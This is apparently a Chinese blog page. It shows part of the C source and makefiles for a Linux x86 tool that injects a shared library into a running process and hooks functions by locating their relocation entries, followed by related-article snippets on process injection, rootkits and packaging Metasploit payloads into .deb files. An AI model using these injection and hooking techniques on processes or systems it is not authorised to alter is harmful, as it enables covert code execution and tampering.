	PRINTSWITCH(PT_GNU_EH_FRAME,type)
	PRINTSWITCH(PT_GNU_STACK,type)
	PRINTSWITCH(PT_GNU_RELRO,type)
	PRINTSWITCH(PT_LOSUNW,type)
	PRINTSWITCH(PT_SUNWBSS,type)
	PRINTSWITCH(PT_SUNWSTACK,type)
	PRINTSWITCH(PT_HISUNW,type)
	PRINTSWITCH(PT_HIOS,type)
	PRINTSWITCH(PT_LOPROC,type)
	PRINTSWITCH(PT_HIPROC,type)
}
void printphdr(Elf32_Phdr *phdr)
{
	puts("---------------------------");
	printptype(phdr->p_type);
	PRINT(p_type,phdr)
	PRINT(p_offset,phdr)
	PRINT(p_vaddr,phdr)
	PRINT(p_paddr,phdr)
	PRINT(p_filesz,phdr)
	PRINT(p_memsz,phdr)
	PRINT(p_flags,phdr)
	PRINT(p_align,phdr) 
}
void printdyntag(int d_tag)
{
	PRINTSWITCH(DT_NULL,d_tag)
	PRINTSWITCH(DT_NEEDED,d_tag)
	PRINTSWITCH(DT_PLTRELSZ,d_tag)
	PRINTSWITCH(DT_PLTGOT,d_tag)
	PRINTSWITCH(DT_HASH,d_tag)
	PRINTSWITCH(DT_STRTAB,d_tag)
	PRINTSWITCH(DT_SYMTAB,d_tag)		
	PRINTSWITCH(DT_RELA,d_tag)
	PRINTSWITCH(DT_RELASZ,d_tag)
	PRINTSWITCH(DT_RELAENT,d_tag)
	PRINTSWITCH(DT_STRSZ,d_tag)
	PRINTSWITCH(DT_SYMENT,d_tag)
	PRINTSWITCH(DT_INIT,d_tag)
	PRINTSWITCH(DT_FINI,d_tag)
	PRINTSWITCH(DT_SONAME,d_tag)
	PRINTSWITCH(DT_RPATH,d_tag)
	PRINTSWITCH(DT_SYMBOLIC,d_tag)
	PRINTSWITCH(DT_REL,d_tag)
	PRINTSWITCH(DT_RELSZ,d_tag)
	PRINTSWITCH(DT_RELENT,d_tag)
	PRINTSWITCH(DT_PLTREL,d_tag)
	PRINTSWITCH(DT_DEBUG,d_tag)
	PRINTSWITCH(DT_TEXTREL,d_tag)
	PRINTSWITCH(DT_JMPREL,d_tag)
	PRINTSWITCH(DT_BIND_NOW,d_tag)
	PRINTSWITCH(DT_INIT_ARRAY,d_tag)
	PRINTSWITCH(DT_FINI_ARRAY,d_tag)	
	PRINTSWITCH(DT_INIT_ARRAYSZ,d_tag)
	PRINTSWITCH(DT_FINI_ARRAYSZ,d_tag)
	PRINTSWITCH(DT_RUNPATH,d_tag)
	PRINTSWITCH(DT_FLAGS,d_tag)
	PRINTSWITCH(DT_ENCODING,d_tag)
	PRINTSWITCH(DT_PREINIT_ARRAY,d_tag)
	PRINTSWITCH(DT_PREINIT_ARRAYSZ,d_tag)
	PRINTSWITCH(DT_NUM,d_tag)
	PRINTSWITCH(DT_LOOS,d_tag)
	PRINTSWITCH(DT_HIOS,d_tag)
	PRINTSWITCH(DT_LOPROC,d_tag)
	PRINTSWITCH(DT_HIPROC,d_tag)
	PRINTSWITCH(DT_PROCNUM,d_tag)
	PRINTSWITCH(DT_VALRNGLO,d_tag)
	PRINTSWITCH(DT_GNU_PRELINKED,d_tag)
	PRINTSWITCH(DT_GNU_CONFLICTSZ,d_tag)
	PRINTSWITCH(DT_GNU_LIBLISTSZ,d_tag)
	PRINTSWITCH(DT_CHECKSUM,d_tag)
	PRINTSWITCH(DT_PLTPADSZ,d_tag)
	PRINTSWITCH(DT_MOVEENT,d_tag)	 	
	PRINTSWITCH(DT_MOVESZ,d_tag)
	PRINTSWITCH(DT_FEATURE_1,d_tag)
	PRINTSWITCH(DT_POSFLAG_1,d_tag)
	PRINTSWITCH(DT_SYMINSZ,d_tag)
	PRINTSWITCH(DT_SYMINENT,d_tag)
	PRINTSWITCH(DT_VALRNGHI,d_tag)
	PRINTSWITCH(DT_ADDRRNGLO,d_tag)
	PRINTSWITCH(DT_GNU_HASH,d_tag)	
	PRINTSWITCH(DT_TLSDESC_PLT,d_tag)	
	PRINTSWITCH(DT_TLSDESC_GOT,d_tag)	
	PRINTSWITCH(DT_GNU_CONFLICT,d_tag)	
	PRINTSWITCH(DT_GNU_LIBLIST,d_tag)	
	PRINTSWITCH(DT_CONFIG,d_tag)	
	PRINTSWITCH(DT_DEPAUDIT,d_tag)	
	PRINTSWITCH(DT_AUDIT,d_tag)	
	PRINTSWITCH(DT_PLTPAD,d_tag)	
	PRINTSWITCH(DT_MOVETAB,d_tag)	
	PRINTSWITCH(DT_SYMINFO,d_tag)	
	PRINTSWITCH(DT_ADDRRNGHI,d_tag)	
	PRINTSWITCH(DT_ADDRNUM,d_tag)	
	PRINTSWITCH(DT_VERSYM,d_tag)	
	PRINTSWITCH(DT_RELACOUNT,d_tag)	
	PRINTSWITCH(DT_RELCOUNT,d_tag)	
	PRINTSWITCH(DT_FLAGS_1,d_tag)	
	PRINTSWITCH(DT_VERDEF,d_tag)	
	PRINTSWITCH(DT_VERDEFNUM,d_tag)			
	PRINTSWITCH(DT_VERNEED,d_tag)
	PRINTSWITCH(DT_VERNEEDNUM,d_tag)			
	PRINTSWITCH(DT_VERSIONTAGNUM,d_tag)	
	PRINTSWITCH(DT_AUXILIARY,d_tag)	
	PRINTSWITCH(DT_FILTER,d_tag)			
	PRINTSWITCH(DT_EXTRANUM,d_tag) 
}
void printdyn(Elf32_Dyn* dyn)
{
	puts("---------------------------");
	printdyntag(dyn->d_tag);
	PRINT(d_tag,dyn)
	PRINT(d_un.d_val,dyn)
}
void printsym(Elf32_Sym *sym,int straddr)
{
	puts("---------------------------");
 	char sname[40];
	memcpy(sname,straddr+sym->st_name,40);
	if(sym->st_name)puts(straddr+sym->st_name);
	PRINT(st_name,sym)
	PRINT(st_value,sym)	
	PRINT(st_size,sym)
	PRINT(st_info,sym)
	PRINT(st_other,sym)
	PRINT(st_shndx,sym)
}
void printlinkmap(struct link_map*lm)
{
	puts("---------------");
	PRINT(l_addr,lm)
	PRINT(l_ld,lm)	
	puts(lm->l_name);
}
int enumprocesssym(int pid,const char*libname,const char*fnname)
{
	unsigned long modbase = (unsigned long)get_module_base(pid,libname);
    unsigned long phdr_addr,shdr_addr, dyn_addr;
	int i;
	if(modbase==0){
		printf("%d[%s] get_module_base=0",pid,libname);
		return;
	}
	printf("modbase=%x\n",modbase);
	Elf32_Ehdr *ehdr = (Elf32_Ehdr *) malloc(sizeof(Elf32_Ehdr));
	Elf32_Phdr *phdr = (Elf32_Phdr *) malloc(sizeof(Elf32_Phdr));
	Elf32_Shdr *shdr = (Elf32_Shdr *) malloc(sizeof(Elf32_Shdr));
	Elf32_Dyn *dyn = (Elf32_Dyn *) malloc(sizeof(Elf32_Dyn));
	Elf32_Sym *sym = (Elf32_Sym *) malloc(sizeof(Elf32_Sym));
	
	struct link_map* linknode = (struct link_map*)malloc(sizeof(struct link_map));
	
	//ptrace_read(pid, (void*)modbase, ehdr, sizeof(Elf32_Ehdr));
	memcpy(ehdr,modbase,sizeof(Elf32_Ehdr));
	printehdr(ehdr);
	int offsetdyn =0;
	int dynsize = 0;
	for(i=0;i<ehdr->e_phnum;i++){
		memcpy(phdr,modbase+ehdr->e_phoff+(i*ehdr->e_phentsize),sizeof(Elf32_Phdr));
		printphdr(phdr);
		if(PT_DYNAMIC==phdr->p_type){
			offsetdyn = phdr->p_vaddr;
			dynsize = phdr->p_memsz;
		}
	}
	int symaddr=0;
	int symsize=0;
	int straddr=0;
	int gotaddr=0;
	int mapaddr=0;
	
	for(i=0;i<dynsize/sizeof(Elf32_Dyn);i++){
		memcpy(dyn,modbase+offsetdyn+(i*sizeof(Elf32_Dyn)),sizeof(Elf32_Dyn));
		printdyn(dyn);
		if(DT_SYMTAB==dyn->d_tag){
			symaddr = dyn->d_un.d_val;
		}else if(DT_STRTAB==dyn->d_tag){
			straddr=dyn->d_un.d_val;
		}else if(DT_PLTGOT==dyn->d_tag){
			gotaddr=dyn->d_un.d_val;
		}
	}
	for(i=0;;i++){
		memcpy(sym,symaddr+(i*sizeof(Elf32_Sym)),sizeof(Elf32_Sym));
		printsym(sym,straddr);		

		if(sym->st_name){
			char sname[40];
			memcpy(sname,straddr+sym->st_name,40);
			if(!strcmp(sname,fnname)){
				return modbase+sym->st_value;
			}
		}
	}	
	return 0;
	Elf32_Addr gotv=0;
	puts("----got------");
	int linknodeaddr=0;
	for(i=0;i<60;i++){
		memcpy(&gotv,gotaddr+(i*sizeof(Elf32_Addr)),sizeof(Elf32_Addr));
		printf("%x\n",gotv);	
		if(gotv==0)break;
		if(i==1)mapaddr=gotv;
	}		
	i=0;
	int laddr = mapaddr;
	while(1)
	{
		memcpy(linknode,laddr,sizeof(struct link_map));
		//printlinkmap(linknode);
		if(linknode->l_next==0)break;
		laddr = linknode->l_next;
	}
	while(1)
	{
		memcpy(linknode,laddr,sizeof(struct link_map));
		printlinkmap(linknode);
		if(linknode->l_prev==0)break;
		laddr = linknode->l_prev;
	}	
	return;
 
}
void	printrel(Elf32_Rel*rel,int straddr,int symaddr)
{
	printf("-----rel------\n");
		PRINT(r_offset,rel)
	    PRINT(r_info,rel)  
	//PRINTSWITCH(DT_NULL,d_tag)
}
int g_symtab=0,g_strtab=0,g_jmprel=0,g_totalrelsize=0,g_relsize=0,g_nrels=0;
void get_dyn_info(int pid,int dynaddr)
{
	Elf32_Dyn *dyn = (Elf32_Dyn *) malloc(sizeof(Elf32_Dyn));
	int i = 0;

	memcpy( dyn,dynaddr + i * sizeof(Elf32_Dyn), sizeof(Elf32_Dyn));
	i++;
	while (dyn->d_tag) {
		switch (dyn->d_tag) {
		case DT_SYMTAB:
			puts("DT_SYMTAB");
			g_symtab = dyn->d_un.d_ptr;
			break;
		case DT_STRTAB:
			g_strtab = dyn->d_un.d_ptr;
			puts("DT_STRTAB");
			break;
		case DT_JMPREL:
			g_jmprel = dyn->d_un.d_ptr;
			puts("DT_JMPREL");
			//printf("jmprel\t %p\n", g_jmprel);
			break;
		case DT_PLTRELSZ:
			g_totalrelsize = dyn->d_un.d_val;
			puts("DT_PLTRELSZ");
			break;
		case DT_RELAENT:
			g_relsize = dyn->d_un.d_val;
			puts("DT_RELAENT");
			break;
		case DT_RELENT:
			g_relsize = dyn->d_un.d_val;
			puts("DT_RELENT");
			break;
		}

		memcpy(dyn, dynaddr + i * sizeof(Elf32_Dyn), sizeof(Elf32_Dyn));
		i++;
	}

	g_nrels = g_totalrelsize / g_relsize;

	free(dyn);
	printf("ok g_nrels=%d\n",g_nrels);
}
unsigned long find_sym_in_rel(int pid, char *sym_name,int dynaddr)
{
	Elf32_Rel *rel = (Elf32_Rel *) malloc(sizeof(Elf32_Rel));
	Elf32_Sym *sym = (Elf32_Sym *) malloc(sizeof(Elf32_Sym));
	int i;	 
	unsigned long ret;
	char str[50];

	get_dyn_info(pid,dynaddr);
	for (i = 0; i < g_nrels; i++) {
		memcpy(rel, (unsigned long) (g_jmprel + i * sizeof(Elf32_Rel)),sizeof(Elf32_Rel));
		if (ELF32_R_SYM(rel->r_info)) {
			memcpy(sym,g_symtab + ELF32_R_SYM(rel->r_info) * sizeof(Elf32_Sym),  sizeof(Elf32_Sym));
			memcpy(str,g_strtab + sym->st_name,50);
			if (strcmp(str, sym_name) == 0) {				 
				break;
			}			 
		}
	}

	if (i == g_nrels)
		ret = 0;
	else
		ret = rel->r_offset;

	free(rel);
	free(sym);

	return ret;
}

int enumprocrel(int pid,const char*libname)
{
	unsigned long modbase = (unsigned long)get_module_base(pid,libname);
    unsigned long phdr_addr,shdr_addr, dyn_addr;
	int i;
	if(modbase==0){
		printf("%d[%s] get_module_base=0\n",pid,libname);
		return;
	}
	printf("modbase=%x\n",modbase);
	Elf32_Ehdr *ehdr = (Elf32_Ehdr *) malloc(sizeof(Elf32_Ehdr));
	Elf32_Phdr *phdr = (Elf32_Phdr *) malloc(sizeof(Elf32_Phdr));
 	
	//ptrace_read(pid, (void*)modbase, ehdr, sizeof(Elf32_Ehdr));
	memcpy(ehdr,modbase,sizeof(Elf32_Ehdr));
	printehdr(ehdr);
	int offsetdyn =0;
	int dynsize = 0;
	for(i=0;i<ehdr->e_phnum;i++){
		memcpy(phdr,modbase+ehdr->e_phoff+(i*ehdr->e_phentsize),sizeof(Elf32_Phdr));
		printphdr(phdr);
		if(PT_DYNAMIC==phdr->p_type){
			offsetdyn = phdr->p_vaddr;
			dynsize = phdr->p_memsz;
			free(ehdr);
			free(phdr);
			if(offsetdyn<0x08000000)return modbase+offsetdyn;
			return offsetdyn;
		}
	}
	return 0; 
} 
int main(int argc, char *argv[])
{
	int c=0;
	usleep(10000);
	//void * handle = dlopen("/home/user1/injectso/inject/so.so",RTLD_NOW| RTLD_GLOBAL);	
	//printf("handle = %x\n",handle);
	int address=enumprocrel(-1,"loop");
	printf("address=%x\n",address);
	int sleeprel=find_sym_in_rel(-1,"usleep",address);
	printf("address=%x sleeprel=%x\n",address,sleeprel);

	 
	while(1)usleep(1000000);
	 
	return 0;
}

makefile

all: hook so
hook:
	gcc -o hook hook.c p_dbg.c p_elf.c  -ldl
so:
	gcc -shared -o so.so -fPIC so.c -nostdlib -lpthread
clean:
	rm hook
	rm so.so
	rm *~

all:
	gcc -o loop s.c  -ldl
	 
clean:
	rm loop 
	rm *~

代码下载地址

http://download.csdn.net/detail/q123456789098/9609159

q123456789098
关注
linux x86平台elf 进程注入so并且实现基于rel的hook ubuntu14.01测试通过
08-21
linux x86平台elf 进程注入so并且实现基于rel的hook ubuntu14.01测试通过
HOOK 完美支持x86/x64
05-24
完美支持x86、x64,调用方式灵活,x64下可以支持 5字节跳转,12字节跳转,14字节跳转,配合 HookApp 内核注入驱动使用,能达到做好的效果。
Android中的so注入(inject)和挂钩(hook)
热门推荐
eqera的专栏
07-21 2万+
对于Android for arm上的so注入(inject)和挂钩(hook),网上已有牛人给出了代码-libinject(http://bbs.pediy.com/showthread.php?t=141355)。由于实现中的ptrace函数是依赖于平台的,所以不经改动只能用于arm平台。本文将之扩展了一下,使它能够通用于Android的x86和arm平台。Arm平台部分基本重用了libinj
向正在运行的Linux应用程序注入代码
linuxheik的专栏
04-17 1184
向正在运行的Linux应用程序注入代码  0x80 @ 系统安全 2012-12-06 共 7468 人围观  小编的话:感谢0×80的认真翻译,辛苦:) ,各位同学,不要吝惜你的顶和评论哦! 原作者:Gregory Shpitalnik 翻译:0×80 1、简介 假设Linux上正在运行某程序,像Unix守护程序等,我们不想终止该程序,但是同时
linux arm和x86 inline hook技术
fanlilei的专栏
11-18 3680
Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM Posted on January 7, 2013 Table of Contents IntroductionFunction Hooking in Suterusu Function Hooking on x86 Write Protec
linux下的动态库注入
Fireplusplus的博客
10-14 1876
前言 最近在维护公司的一个服务X,服务X因为协议设计的不够安全,存在被攻击的风险,所以修改协议提升安全性就显得势在必行了。然鹅,该项目涉及到多个版本,将改动合入到各个版本引起的开发及测试工作量颇大,最终讨论后决定通过动态库注入的方式进行修改。 何为动态库注入 动态库注入是指在程序启动或运行的时候,通过某种手段加载另一套接口库,替换原有依赖库中的函数。这样可以达到改变程序功能而又不对原有代码进行修改的目的。 如何做 linux下有一个环境变量叫LD_PRELOAD,动态链接器在载入一个程序所需的所有
linx-mongodb x86 linx-mongodb x86
11-26
在“linx-mongodb x86”中,"x86"指的是适用于基于Intel或AMD x86架构的Linux系统的MongoDB版本。这个压缩包文件"mongodb-linux-x86_64-3.4.9"包含了MongoDB 3.4.9版本的二进制可执行文件,适用于64位的Linux系统。 ...
_bz2.cpython-36m-x86_64-linux-gnu.so,.zip
最新发布
09-25
描述中同样提到了“_bz2.cpython-36m-x86_64-linux-gnu.so”,这表明这个文件是为Python 3.6编译的,并且适用于x86_64架构的Linux系统。"cpython"代表这是Python的C实现,即官方的标准解释器。"36m"表示这是Python ...
LINX喷码机维修
03-31
LINX喷码机是工业生产中常用的设备,用于在产品或包装上喷印相关信息,如生产日期、批次号、条形码等。LINX6200喷码机的操作速成指南涵盖了启动、停机、编辑资料、选择喷印资料、调整喷印字宽、调整喷印字高、调整喷...
LINX协议源码
11-21
1. **跨平台兼容性**:由于LINX是用于分布式系统,因此它必须支持多种操作系统,如Linux、Windows、Unix等,以适应不同的硬件和软件环境。 2. **高效率**:LINX协议栈设计时会考虑性能优化,可能包括快速的数据包...
Arduino和LabVIEW+LINX的互动应用
07-26
首先,我们将对Arduino控制板和LabVIEW软件进行基础知识的概述,然后深入探讨LabVIEW Hacker LINX工具包的功能与使用,并对开发过程中涉及的软件安装步骤进行详尽说明。 Arduino控制板是一种开源的微控制器平台,...
linux共享库动态注入
weixin_33962923的博客
04-01 152
2019独角兽企业重金招聘Python工程师标准>>> ...
linux演示视频,linux动态注入(含视频演示)
weixin_42282116的博客
05-12 104
//inject.c#include#include#include#include#include#include#include#include//注入指令块(打印"it'sme~")#ifdefENV_I386#defineCODE\"\xeb\x15\x5e\xb8\x04\x00\x00\x00"\"\xbb\x02\x00\x00\x00\x89\xf1\...
基于Linux的动态注入技术实现的文件读写追踪器
毕业作品网站
05-31 347
介绍 一款适用于 Linux 系统的动态追踪文件读写信息的共享库。原理是通过重写与 IO 相关的函数,在程序运行前优先加载本动态链接库,实现记录文件读写信息。 使用 LD_PRELOAD 注入程序 LD_PRELOAD 是 Linux 系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常
linux进程inject,linux-inject:注入代码到运行的Linux进程中
weixin_33907300的博客
04-29 1091
最近,我遇到了linux-inject,它是一个注入程序,可以注入一个.so文件到一个运行中的应用程序进程中。类似于LD_PRELOAD环境变量所实现的功能,但它可以在程序运行过程中进行动态注入,而LD_PRELOAD是定义在程序运行前优先加载的动态链接库。事实上,linux-inject并不取代任何功能。换句话说,可以看成是忽略了LP_PRELOAD.它的文档很匮乏,理由可能是开发人员认为大多数...
linux-inject:注入代码到运行的Linux进程中
hpp24的专栏
08-05 7731
最近,我遇到了linux-inject,它是一个注入程序,可以注入一个.so文件到一个运行中的应用程序进程中。类似于LD_PRELOAD环境变量所实现的功能,但它可以在程序运行过程中进行动态注入,而LD_PRELOAD是定义在程序运行前优先加载的动态链接库。事实上,linux-inject并不取代任何功能。换句话说,可以看成是忽略了LP_PRELOAD. 它的文档很匮乏,理由可能是开发人员认
linux进程inject,Debinject–Linux注入器简单利用
weixin_29468561的博客
04-29 407
49A4C4B17434FEEBB265623A71B4A34D.jpg (1.7 MB, 下载次数: 37)2017-8-26 19:05 上传Debinject他其中就是将msf的Payload 注入到deb中。然后开启监听得到会话。让我们看看具体的操作吧56F6D20E-96BF-4D705A88D-169624D2D400.jpg (90.65 KB, 下载次数: 42)2017-8-26...
linux下cpu、内存、硬盘、网卡故障注入
sun172270102的博客
03-01 2347
1、下载使用 软件下载路径: https://github.com/chaosblade-io/chaosblade/releases/download/v0.9.0/chaosblade-0.9.0-linux-amd64.tar.gz 无需编译安装,解压即可使用。 1、cpu压力注入 帮助信息查看: ./blade create cpu --help 创建任务: ./blade create cpu fullload --cpu-list 0,1,2 --cpu-percent 90 {"code":2
将你的Rootkit代码注入到一个Linux内核模块
Netfilter
05-07 1万+
前段时间从完成“实时获取系统中TCP半连接数量”这个永远无法上线的半吊子需求开始,一发不可收拾地栽进了Rootkit深坑,有点走火入魔,写了好多篇这方面的随笔并结识了很多朋友,感觉不错。 前面的系列文章中,大多数都是描述某个技术点的,而你想利用这个技术点做点实际的好事或者坏事,其实还有一段很长距离的路要走,比如: 谁给你的root权限? 你会编程并且编写Linux内核模块吗? 系统中有gcc和m...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值